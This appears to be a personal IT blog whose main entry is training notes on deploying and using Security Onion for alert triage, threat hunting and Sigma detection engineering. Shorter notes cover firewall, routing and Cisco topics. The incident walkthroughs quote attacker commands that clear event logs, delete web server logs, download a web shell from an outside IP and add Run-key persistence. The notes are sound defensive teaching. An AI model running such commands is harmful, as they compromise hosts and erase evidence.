Wednesday 25 August 2021

Security onion

 

Platform

  • OS: CentOS / Ubuntu (using docker)
  • Infra: Salt, Docker, Elasticsearch, Redis, Logstash, File beat, Grafana
  • Network and host data: Wazuh, Osquery, Beats, Steno, Suricata, Zeek, Strelka
  • Analyst tools: SOC, Hunt, Kibana, TheHive, CyberChef, Playbook, Fleet,  Navigator


Install modes

  • Forensic analysis (import note) (after the fact)
  • Analyst workstation (expanding malware inside a VM)
  • Test (evaluation) just for testing
  • Production
  • Standalone - small environments
  • Distributed - recommended, sec onion grid with roles split up onto different servers


Where to get help

  • securityonion.net/help
  • docs.securityonion.net FAQ
  • Forum (github discussions)
  • Paid support available

Install

  • Download the ISO from https://securityonionsolutions.com/software
  • The ISO is on github
  • ISO is 7GB
  • Verify your image
  • The ISO image is the quickest and easiest method (Installs centos 7)
  • Its possible to also do a git clone on your CentOS/Ubuntu server
Min spec
12GB
4 CPU

Standalone min spec
16 GB 
4 CPU
200GB (or more) SSD recommend

Virtual box used for testing
Installing in virtual box I pick linux -> other 64bit

You would want more in a production environment 

Security onion offer appliances

Storage

  • Local storage is support
  • Remote/Network storage may work but not supported

NIC (Intel preferably)

  • One for network / management
  • One for sniffing of traffic
  • Wireless interfaces not support but may work

UPS

  • UPS is recommended because SecOnion uses various databases which don't like power outages.

Server/Appliance terms

  • Standalone everything on one server. Can be taxing for larger environments 
  • Manager node stores the logs and runs all the reports
  • Search nodes can be used to parse and index events
ISO install
The ISO will ask you for a user, this is for the underlying OS
After install you will be asked to reboot
After login so setup will start
Chose mode type
  • Standalone - all components on a single system
  • Distributed - components split across nodes, for larger networks
  • Import - for importing pcap and logfiles
  • Other - other types
You have to agree to elastic license.

Standard - the manager has internet access (most installs)
airgap - manger does not have internet access 

Select MGMT NIC
Recommended to use static IP eg 192.168.80.45/24
Setup asks for direct internet or proxy. (Direct for most installed)

Select the monitor NIC.
This will be connected to a SPAN port or network tab

Set updates for the CentOS (automatic recommended)

Enter the home network (HOME_NET) you'll want to see your inside networks here.

Enable all components to be installed

Keep docker default IP range

Enter email username and password for the web interface

Select to access web interface by IP
If you use hostname you need to have it resolving in DNS or /etc/hosts

Config NTP

Yes allow so-allow. Can fill in a host IP or range 192.168.80.0/24

Checking after reboot or
sudo so-status (wait a few minutes for everything to start up and have a status of "OK")

Extra agents
You can install extra agents to get more info from the hosts. However this is 3 more agents to install/config and maintain. The installers can be downloaded from the seconion web interface

Sysmon / winlogbeat
Download MSI's from SecOnion web interface
Download sysmon from microsoft 
Download sysmon config from github (swiftsecurity)

run so-allow on seconion (runs on port 5044)
config network beats are to come from

install sysmon with config on the target host(s)
install winlogbeats on host
config file = C:\ProgramData\Elastic\Beats\winlogbeat\winlogbeat.yml
There is an example file 

config winlogbeats to forward events to seconion server
start the service "winlogbeat"
Winlogbeat ships Windows event logs to Elasticsearch or Logstash
C:\Program Files\Elastic\Beats\7.15.2\winlogbeat\winlogbeat.exe"

start mspaint
check eventvwr 
applications + services logs -> Microsoft -> Windows -> Sysmon Operational

This event should have been forwarded to seconion. Wait a few minutes and check the web interface. Go to hunt -> * | groupby event.module event.dataset

wazuh (HIDS)
so-allow -> w
sudo so-wazuh-agent-manage 
add agent
extract auth key
Install MSI on target host
Tick to launch config
Fill in manager IP 10.4.9.90
Fill in auth key
start service from services.msc

osquery
so-allow -> o
[a] - Analyst - 80/tcp, 443/tcp
[b] - Logstash Beat - 5044/tcp
[e] - Elasticsearch REST API - 9200/tcp
[f] - Strelka frontend - 57314/tcp
[o] - Osquery endpoint - 8090/tcp
[s] - Syslog device - 514/tcp/udp
[w] - Wazuh agent - 1514/tcp/udp
[p] - Wazuh API - 55000/tcp
[r] - Wazuh registration service - 1515/tcp

fill in network or host

Install MSI on target host, it should automatically install

Ensure service is started
LauncherSoLauncherSvc
C:\Program Files\Kolide\Launcher-so-launcher\bin\launcher.exe"

You can check the config file
"C:\Program Files\Kolide\Launcher-so-launcher\conf\launcher.flags"
hostname should be mananger server 10.x.x.x:8090


Analyst tools

Remember so-status to make sure everything is up and working
sudo so-test (download PCAPs and replays them in the system, needs internet access)
Log into the web interface 
Login with email address configured during setup
  • Alerts - Review alerts the system has detected
  • Hunt - Look for threats, looks for things they may not have triggered an alert.
  • PCAP - For pcap imports
  • Sensors - All the sensors connected to the management server
  • Downloads - Packages for beats/endpoint agents
  • Administration - admin of the system
  • Kibana - Visualisation of elastic data with dashboards/categories
  • Grafana - Visualise the performance of the system
  • Cyberchef - useful tools during investigations
  • Playbook - build detection playbooks for when something new appears
  • Fleet - Web interface for OSquery (servers and clients details)
  • The Hive - Case management (alerts can be escalated into a case in the hive)
  • Navigator - Visualise coverage from attack frame work
Alert triage and case creation

Start on the alerts interface
On a regular basis an analyst should be looking at these alerts.
The idea here is that they will work on the queue each day and try to get it down to 0.
They can open cases for other teams to resolve issues.
They will need to figure out if its something that needs to be escalated or something that can be acknowledged/dismissed.
This is a task on its own.
It can be sorted by high severity

One for example "Dropbox client broadcasting" this could be a legitimate host that is actually using dropbox. When you drilldown and check the IPs then you can click the bell icon to make it go away but it will come back. You can tune the system to ignore that rule. Similar ones are skype.

Once we have tuned out common apps we can look for real threats.

If we see "checkin" that suggest the malware is on a PC and its trying to contact a CnC server. We can drill down into this event. Here we can get more info like source/destination IP.

You can click on show PCAP for this event which wil show us the PCAP of this event.
Blue is from our source client
Red is the destination server

Endpoint is posting binary data to some suspicious URL like malware.web

Now we can look into our source client and see if there are other others.
Click source IP and click "empty" magnifying glass to see all alerts for this host
We can see an EXE was downloaded

From the Header we "MZ" "PE" and "This program cannot be run in DOS mode." this lets us know this is a windows executable.

We could download it as a PCAP
Open in network miner and generate a hash for the file
Check virus total for that hash which might identify the virus

Zeek is running so we can check that for file events for that external IP. Click the target to go to the hunt interface

It will be common for you to move from alerts interface to hunt interface.
Lets look at the zeek file log
Zeek has analyzer the file and we can see
hash.md5
hash.sha1 left click and go to VT (virus total)
We can see the file was detected by 50/70 scanners

We are pretty sure this is malware. We need to make a case in the hive now. We do this because we want to store all the info in one place. We may need to hand over to another shift or another team to do the clean up. 
Click on the blue escalate icon on the download event
Do the same on the checkin event
Any other events you want 

Go to the hive
Each event will have its own case
We can merge all the events into one case to keep them together
We can attach observables like the hash, exe, URL, source and destination IP
Tick that its an IOC
We can add tasks:
  • investigate other alerts from the compromised hosts
  • get someone to clean the infected hosts
  • block the CnC IP on your firewall
  • look for other connections to the CnC IP (find other infected hosts)
AD Hoc Hunting
Instead of looking at alerts, we will ask/answer questions.

For example, looking at all of the HTTP traffic seen, what destination ports were used ? We would expect port 80 and port 443 for HTTPS. However if we see some traffic using strange ports like 66666 we want to know about that traffic and start looking into it. Is it legitimate or not ? 

Other things to hunt for
  • Checking HTTP status codes and messages. Are we seeing any non-standard results. For example we expect code 200 message OK. What if we see code 200 message lol
  • User agents seen on the network. We would expect mostly the companies browser but there could be other user agents some could be legit others not.
  • Searching for linux commands like dig curl nc being used on windows hosts
  • Filter on traffic that was allowed to pass through the firewall (can group by source IP, destination IP)
  • Looking at port 22 (SSH) often used to tunnel in. Most orgs would have legitimate SSH traffic that would need to be excluded
  • Checking the number of alerts over time. If we see a spike in alerts for example normally we get about 50 alerts but then one day we 150 in a short period of time. This should trigger an investigation. What caused those alerts, where did it come from etc.

OQL (onion query language) used for searching the data
event.dataset: alert | groupby event.module event.severity_label

Events will be listed at the bottom. Each event call be drilled down into

If we click the drop down arrow on the OQL bar there are many pre-defined queries setup for us.
event.dataset: http | groupby destination.port

Now we can see most stuff is going over 80/433. 
We might see some on port 8080 a common alterative port
Left click one of the strange ports and click "plus" magnifying glass

Our OQL changes to this
event.dataset: http AND destination.port:"8008" | groupby destination.port

Looking at this event
We see a strange host 4hhg.56hdshfjds.rocks (left click VT)
Sometimes the URL looks bad but its actually fine
Malware domains might be new and change a lot.

The analyst was able to recognise base64 with the padding "==" on the end
They took this string into cyber chef
From base64 
We got an output but it didn't make much sense
Magic operation tries to figure out the string
Intensive mode will try brute force it which can take time / impact the system
Scroll through and see if we can find anything recognisable 
Doing this we spotted some public IP addresses.

Network.community ID is a hash of the 
  • Source IP
  • Source port
  • Dest IP
  • Destination port
  • Potocol
We can search for that community ID 

Click the network.community_ID and click the "clear" mag glass

OQL
"1:aasjklfhalksfhkjha" | groupby event.dataset event.module 

We can see some stuff from Zeek and Sysmon. (need agent installed)
The network community ID makes it easy to corelate between different log sources.
Hover sysmon
We can see the PC is ran on
The process that was run
The user that ran it
You can google search the process and VT search too

In this case windows defender was downloading a file from the internet. We are not sure if it was legitimate or not.

Parent command line can be useful to look at often bad stuff will be launched from a wscript or powershell.

We can look in Fleet (web management interface for OSquery)
OSquery lets you query the system like an SQL style language
SELECT * FROM users;
Maybe you see a user that shouldn't be on this system or a strange new user.
Checking the machine for auto starting software is a good place to start
SELECT * FROM startup_items;
Also services and scheduled tasks
SELECT name,action from scheduled_tasks;
You can filter for mpcmd looking for that CLI

This is an example of how ad-hoc hunting can help
  • We looked at outbound http traffic
  • Looked at outlyers
  • Drill down into port 8008
  • This lead to a PCAP where we found public IP's
  • We used community ID which lead to sysmon log
  • We found the process that created that network connection
  • We queried fleet (osquery) to find where this is being run from
  • We found on the machine where that process is starting up
  • We should create a case in the hive
Sometimes you will find legitimate software like old servers/services that haven't been shut down but still good for the business to clean these up before they cause a security issue

Detection engineering
  • Detection gap - understanding where we are not monitoring
  • Configure Detection pipeline - Setup new sensor, install osquery, configured logs
  • Write/Test detection - Creating your own detection rules
  • Production and tuning - Enabling the rule in production, usually will required tuning

Detection playbook
  • Objective - Useful info for later and other teams
  • Machine query - Can be zeek script, playbook, sigma signature etc
  • Next steps - What do we do after detection, how do we fix it
Playbook has lots of plays already created for you.
You can go in and view the play
View ElastAlert Config 
View Sigma 

Next steps examples could be lock down permissions on the share and contact system owner.

Sigma is an open signature format. Can be applied to any type of log file. The idea is to make it easy for sec works to easily write and share signatures
snort/surricata rules for network ids
yara rules for files
Sigma rules are for logs
Sigma is yaml

For example we can look for windows accounts being created. Not something bad on its own but we might find attackers are creating their own users. Windows Event log ID 4720. Does the username follow our company policy naming convention.

Click Convert to change it to an SO elasticsearch query.
Click copy
Go to the hunt tab and paste the query and make sure we are getting results
Edit play as needed
Now we have tested its working we can "create play from sigma"

Edit the play
Change the status from "Draft" to "Active"
Now the its in production and will be looking for those logs

When the play generates an alert it will appear in the Alerts tab. The source will be from playbook. If one pop's up that we don't recognise we can see the play details and read the objective of the play. If we create a case in the the hive we can see tasks already setup from out play. This is good because we go from detection to next steps and we have context of why the alert popped and why its important to fix.

Security Onion 2
Security onion 2 released OCT 2020
You want to monitor north/south directly behind the firewall. Traffic that is going in/out from the internet.
East/west traffice from client DMZ <-> Servers
SO also likes to collect windows logs from the servers and clients

NIDS alerts from Surricata (Starts and investigation)
Protocol metadata from Zeek (Provides context)
Full PCAP from Google Stenographer (high performance/indexing)

Sniffing NICs
Collect the raw data AF_PACKET (built into linux kernel by default)
AF_PACKET kernel based load balancer.
The purpose of an AF_PACKET socket is to allow network communication at the link layer, for example to receive or transmit raw Ethernet frames.
Consuming from AF_PACKET is Stenographer / Surricata / Zeek
They write their data to several locations
  • Stenographer -> Full packet capture -> /nsm/pcap -> sensoroni agent
  • Surricata -> IDS alerts -> /nsm/suricata -> Filebeat
  • Zeek -> Protocol Meta data -> /nsm/zeek/logs -> Filebeat
  • Zeek also extracts files like EXE, PDF -> /nsm/zeek/extracted/complete/
  • Those files are then analysed by Strelka
Strelka is a real-time, container-based file scanning system used for threat hunting, threat detection, and incident response.

FileBeats is the platform for lightweight shippers to push data from your servers to the Elastic Stack. We can have a filebeat for mac or windows etc. So windows logs are shipped into your SO Elasticsearch/logstash

Endpoint visibility
OSquery - cross platform way to collect logs from clients. We can also query endpoints with and SQL based language  
Elastic beats - Alternative to OSquery. winlog beast, filebeat, auditbeat etc.
Wazuh HIDS - Host based intrusion detection system. Also cross platform for log collection. root kit detection etc.
Sysmon - sysinternals gives great logging for windows. These will be pulled off the endpoint with one of the agents above
autoruns - sysinternal tool also give great information
There are some options here and the enterprise can choose what works for them

SOC (security onion console)
New management interface
One stop shop to access all of the interfaces

Alerts interface
Any IDS when we set it up we get lots of alerts. Too many. How can we slice and dice the data. SOC has created a simple but powerful interface.
Sec analyst should work on the alerts queue and try get it down to 0 each day. Weed out false positives, normal stuff, investigate suspicious stuff and open cases for confirmed malware infections etc.
Pivot from alert -> full pcap
Pivot from alert -> hunting interface
Alert interface is not just 
  • Surricata alerts (NIDS)
  • Zeek alerts (file / dns etc)
  • HIDS alerts (wazuh)
  • Yarra file matches (Strelka)
  • Playbook matches (Sigma sigs and you own custom detection playbooks)

Hunt interface
Asking questions getting answers
Looking for outliers
Think like an attacker, what would they be trying to do
Crown jewels approach. Our most important data is on server A in database X so lets look at traffic and processes to/from this server/database.
Ransomware often looks to encrypt fileshares, lets look at activity on those.
Pivoting to full PCAP, virtus total etc

Kibana dashboards - visualising data
CyberChef - Tools for encoding/decoding 
Playbook - Pull rules from the sigma community, convert them to run on an elastic search backend. Moving threat hunting into an automated process. We might find a threat on one customer, create detection remediation and copy/paste that play.
Fleet - Web interface for OSquery
The hive - case management tool, all interfaces can escalate and create a case in the hive (blue triangle)
Attack Navigator - MITRE frame work. This is the idea of trying to follow attackers tactics
Grafana - Monitor health of deployment

Analyst workstation
If you are extracting malware reverse engineering some software you will want to do that inside a VM
You want to run it inside an analyst workstation 
Gives you the usual tools

Community power
  • Emerging threats NIDS rules
  • Wazuh HID rules
  • Sigma rules
  • Yara rules  / Strelka
  • Elastic common schema  (ECS) other tools can work with this
  • Community ID for correlation
Searching for the community ID value will help you find other alerts/logs from other sources. Can help you find stuff.

Search osquyery for that community id and it can return the process that generated that network traffic.

Sysmon is free but its not open source. Community id has been requested but has not been added yet. OS has sponsored a way to dynamically generate the community id value. Now you can correlate all of your logs together.

Use cases
Smallest forensics VM, import pcaps 
Production deployment. Start with a standalone deployment on a server. Everything working on one server. Will work ok in smaller enviornment
You will probably want to scale to production deployment - distributed 
Central server / manager
One or more forward nodes - sensors forward all the logs to the manager which stores them in search nodes
One or more search nodes - search on the data

As we move from forensics VM -> standalone -> distributed the resource requirements go up. 

Raw PCAP -> Forward Nodes (osquery/strelka/surricata/wazuh/zeek) -> Filebeat -> Forward logs -> Manager (logstash -> redis -> elastic search) -> Search nodes (logstash -> elasticsearch <-> Currator)

This design is scalable because if we want to add more network visibility we can add more forward nodes. If we are getting slow searches we add another search node.

Snort support
Looking at adding snort later when the 3.0 is released

RHEL 7 support
Working on support for that in the future

MSP
No MSP style manager yet
Looking at adding redundancy for managers but longer term pipeline
At the moment the customer should create their own grid and admin it from there.

Analyst desktop
so-analyst-install
Install so 2 in a VM (analyst install) 
No sniffing
No elastic search
Just PCAP tools

You can do a full standalone 
after setup is completed install so-analyst-install

You could also do Centos minimal install 
git clone the script

Wazuh
Every nodes runs a wazuh manager
Wazuh api
Rules

Can I point firewall syslog (or other device) to the manager
This is possible. You can send it to forward node or manager

AWS
SO 2 AMI will be on the market place


Alert Triage & Case Creation

We assume security onion has been installed correctly.
HOME/EXT_NET variables have been configured

Alerts tab check the alerts for the last 24 hours
Bell icon acknowledges alerts (makes it go away)
The blue triangle escalates it. This opens a case in the hive.

Left click on the alert name and drilldown
Click the arrow to expand details
Check the source/destination IP's
Get info on your servers
Look at rule.rule
Look at the network data decoded

We can left click on attacker public IP and click only to see all events for that IP

If we esclate that will create a case in the hive
In the hive we can see the case is created, we can add extra info in here
Go into the observables and add the IP's we found along the way
The give will compare observables between cases and we might spot something else

Security event log cleared coming from playbook
Looks bad someone was clearing out logs

Commands completed surricata
left click network data decoded -> actions -> pcap 


Left click the attacker ip -> actions -> hunt
This will bring us to the hunt interface

We might find a webshell.php add it as a file on the observables in the hive

If we have a web shell we want to know where it came from and what it did.
Looking at the network logs/pcaps 

Go to pcap interface
select sensor name
source/destination IP 
Anything that was exchanged on that day
this will generate  a pcap of all the traffic between the attacker and the webshell server
attacker ran "wevtutil cl Security" to clear the security logs
We may also see "wevtutil cl Application"
Deletion of the web server logs "del /f /q c:\xampp3\apache\logs\*"

What if the traffic was over port 443
Playbook uses sigma rules (vendor agnostic rules) to look for attacks
event_data.message
event_data.winlog.event_id 1102 (log cleared)
need windows event log forwarding

Can click on the username  -> hunt
click on process create -> include
process.command_line -> group by
group @timestamp


How did the web shell get on there.
Hunt interface query
"webshell.php" | groupby @timestamp event.module event.dataset
We may see
powershell event
zeek
surricata

Looking at powershell event 
winlog.event_data.ScriptBlockText
Invoke-WebRequest -Url "http://100.200.7.7:/webshell.php" -Outfile C:\xampp3\htdocs\webshell.php"
This is like a wget to download the php script
Next step would to be see the user
winlog.user.name 
left click user "bob" and include
remove "webshell.php" because we want to see everything bob did
Open an event with the arrow > click the script block text layers so it shows as a group field 

We can look for the attacker IP where the script came from 100.200.7.7
We can add the hash to the hive

From the hunt page
left click -> hash.md5 -> actions -> pcap
We can get the full pcap of that file so we can look at it and see what it does
In this case the webshell was a standard on available in github

In the hive we can add tasks for teams

web team clean up webshell.php
server team remove attacker account
server team reset bob user password and check devices
server team remove RDP access via the internet install MFA etc.

When we close the case the observables will still be compared in the hive.

Ad hoc hunting
Not all malicious activity will generate alerts
When hunting we need to ask questions, find the answers all the time looking for suspicious activity

Hunt interface has the OQL (onion query language)
Work off last 24-48 hours

The down arrow has lots of predefined queries.
groupby event.module event.dataset
windows_eventlog (windows logs to be forwarded to security onion)
zeek logs
ossec (wazuh agent to be installed) 
sysmon (service to be installed)
osquery (agent to be installed)

Left click -> include on zeek 
include on ssl traffic
SSL is encrypted 
(In options you can disable the automatic update group by)
Expand an event and click the layers to add group-by fields
Remove event.module and event.dataset

Now you can see SSL traffic
Most HTTPS/SSL traffic should be on port 443
You can exclude 443 to see if there is anything running on other ports
You can look into this, is it normal

ssl.validation_status is good to look at
We might see certificate has expired
We could find self signed certificates

Looking at the count and ssl.server name 
you can see what servers are being visited alot
You will see a lot of Microsoft and CDN
You could exclude microsoft.com

Often we see shell scripts run from free public hosting sites like
github, pastebin, dropbox, googledrive, onedrive etc

Hunt for ssl.server_name: *.githubusercontent.com
Left click source IP and click -> group by

Once you find a strange event left click -> actions -> correlate 
This will show all related events
Check the conn log
Correlate again on the network.communit_id

You may find a process
On the process GUID you can left click -> only on the GUID

Arrange your timestamps on earliest.
We can see the process does a DNS query for malware.net
We can do a query on virus total for that
From there it looks like a crypto miner
We can see other related URLs / exes etc

You can make a timeline with 3 lines:
Alerts
Network
Host

Fill in all the information you have 

We see that malwareS.64.exe started and launched nslookup.exe with process injection. The attacker used the legitimate nslookup process to launch their own process hidden inside. 

We can see it connecting to xmr.2miners.com
We can use the parent process value to traceback where it came from
Tracing it back you can see the user downloaded a bad .exe file and ran that.
That .exe file launched the malware.

Looking at the command line of the processes we can see the malware adding itsself as a service so it starts up with the PC
cmd /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "malwareS64" /t REG_SZ /F /D "C:\users\bob\AppDataLocal\Temp\malwareS64.exe"

We see the parent process was explorer.exe and the hash for this checks out so this confirms the user launched it from windows as normal.

Normally we will see a dropper process which goes out to get the malware, then it will install persistence and finally check in with CnC servers. In this case it was a crypto miner which would just use computer resources and probably not do anything bad like ransomware.

Now we have to follow on tasks to clean up and remediate and follow on hunts.
Can we build automatic detections
We have IP's / file hash's that we can check the rest of our org
Keep in mind hash's and IP's are easy to change
nslookup is generally used by IT staff, not by normal users, we could alert when normal users are trying nslookup

Spotting crypto miners
We might see --algo for example

Network outliers TCP/4444
ComandLine stacking. Looking for process injection.
Startup tasks - many things add startup files. You might not want to alert on it but you may want to hunt on it.
Should the user bob have rights to download and install.exe files

The takeaway is when we find a suspicious event we need to think about what happened before and what happened after and try to build a timeline and figure out what happened.

Detection Engineering
Detection engineering starts when we realise we have a gap in our detection. This could be when we are starting out with nothing or when we have an incident where a user downloaded malware and we found out later.

Detection gap -> identify and config data source -> Write + Test detection -> Deploy to production and tuning

Lets say we want to know about google workspace
We can see google workspace provides an audit log

Setup a service account in google workspace
Config security onion
Config elastic filebeat (has modules for lots of datasources)

Download the .json file from google
Remove the other scopes from the service account
We only need read only reports.audit scope

In security onion manger on CLI
Copy that .json file to the manger

*note* do some research on salt, pillar and minion

vi /opt/so/saltstack/local/pillar/minions/so-manager_standalone.sls

appened to the end the config for the filebeat moduile
filebeat:
we specify the path to the .json file
the account
the interval

These are yaml files so the spaces are spaces not tabs

Restart the service
so-filebeat-restart

Check the logs
tail -f /opt/so-log/filebeat/filebeat.log

*note* In GUI -> cheat sheet the important files and logs are listed there.

Query elasticsearch for google workspace
so-elasticsearch-query _cat/indices | grep google_workspace
We should see some indices with some logs

*Note* you may see a "!" on grid because you restarted filebeat recently it will go away on its own

Go into hunt interface and look for logs from google_workspace

We can see event.action is the data we are looking for. Now we've got the data into security onion we need to create a dection.

In google workspace lets add a user to an admin group. That will generate an event and we want to make a detection off that.

googl_workspace.admin_rule

Go to playbook
Change plays from draft to active to turn them on
Plays are made from sigma rules
Sigma rules are written in yaml
Sigma rule are vendor independent 


title: google work space - user granted admin ruile
status: experimental
description: detects when an admin role is added to a user
author: SOS
logsource:
 product: google_workspace
 service: admin
detection:
 selection:
  event.dataset: google_workspace.admin
  event.action: ASSIGN_ROLE
  google_workspace.admin.role.name|contains: admin
condition: all of them
falseposittives: legit user-add
fields: user.target.email
level:high

Drop that ino playbook. that will convert the sigma into the SO elasticsearch query. You can copy and paste that into the hunt CLI to see if its work. Once you are happy with it you can make the play.

Edit and change the status from draft to active

Now when we add an user to an admin role it should create an alert

By default elastic alert is running every 3 minutes so you might have to wait a little while to get data from your new active play generating alerts in the SO interface.


Setting up Sysmon

Setup the manager
ssh to the manager
sudo so-allow
b for logstash beat
enter ip address or range where the clients will come from

Install sysmon on the client(s)
Sysmon records important events to the windows event log
Download and install sysmon on the windows client. It installs a service.
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

Sysmon can be very chatty you can config this
There is a swift on security config file which you can use as a good starting point

sysmon -i sysmon-config.xml

Install winlogbeat
Winlogbeat sends the windows event logs (which contain the sysmon logs) to security onion
In your manager go to the downloads section on the left.
Like sysmon it needs some config too.
Output will go to the manager IP on 50

Install and check the box to the winlog config directory
You will want a config .yaml file

Open up services
Look for elastic winlogbeat oss service and restart it

Now you can open mspaint.exe
Look in events logs in eventvwr
windows logs -> application -> microsoft -> windows -> sysmon -> operational
You should see the log for mspaint being launched.


Gothchas
If the /nsm fills up to 90% the pcap's will be stopped. Security onion gives 200 gig as minimum but looks like in reality you need a lot more.
location of file to config HOME_NET opt/so/saltstack/local/pillar/global.sls

HOME_NET is hnmanager
global:
     soversion: 2.3.90
     hnmanager: '10.4.9.0/24,10.4.10.0/24'

EXTERNAL_NET can be added like so
suricata:
  config:
    vars:
      address-groups:
        EXTERNAL_NET: "!$HOME_NET"

Sensor files are in here:
opt/so/saltstack/local/pillar/minions/




Wednesday 18 August 2021

bulk edit rules on palo alto firewall

making a note here about bulk changing rules on palo alto firewalls. Apparently you can use expedition tool, import config, make changes, export config. There is another thing called cpan https://github.com/PaloAltoNetworks/pan-os-php which is similar but you can do it on CLI. I didn't have the time or the energry to try install and get it working but something I might look into in the future.

Tuesday 10 August 2021

add static route on windows OS

 had a strange case where I needed to reach 169.254.x.x but the windows OS was not forwarding traffic for it out its network card


Run cmd as admin

route print (to get GW x.x.x.x)

route -p add 169.254.0.0 MASK 255.255.0.0 x.x.x.x

Thursday 5 August 2021

cisco duo DAG setup

 https://duo.com/docs/dag-linux

replaced by universal prompt / sso

See

https://duo.com/docs/sso-ciscoasa


add cisco ID account to contract for SW download

Look up your original order ID

Look for the PAK code

Go to https://ccrc.cisco.com

Look up the PAK code,  here you can find the contract number

Follow these instructions

  • Go to Cisco Profile Manager
  • Select 'Access' tab
  • Click on 'Add Access'
  • Choose 'Full Support' and click on 'Go'
  • Enter service contracts number(s) in the space provided and click on the 'Submit' button.

https://community.cisco.com/t5/smart-net-total-care-portal-and/how-do-i-associate-a-contract-to-my-cisco-com-profile-cco-id/td-p/2744620


If they still are not added 

email: web-help-sr@cisco.com

Hello,

Can you add user@email.com to the contract 123456789 (Cisco anyconnect Apex) or tell me what has to be done to allow this.

User works for our customer ACME

My Cisco ID: ciscoid@email.com

Customer: ACME

Contract #: 123456789

Let me know if you need anything else.

Regards,

Jack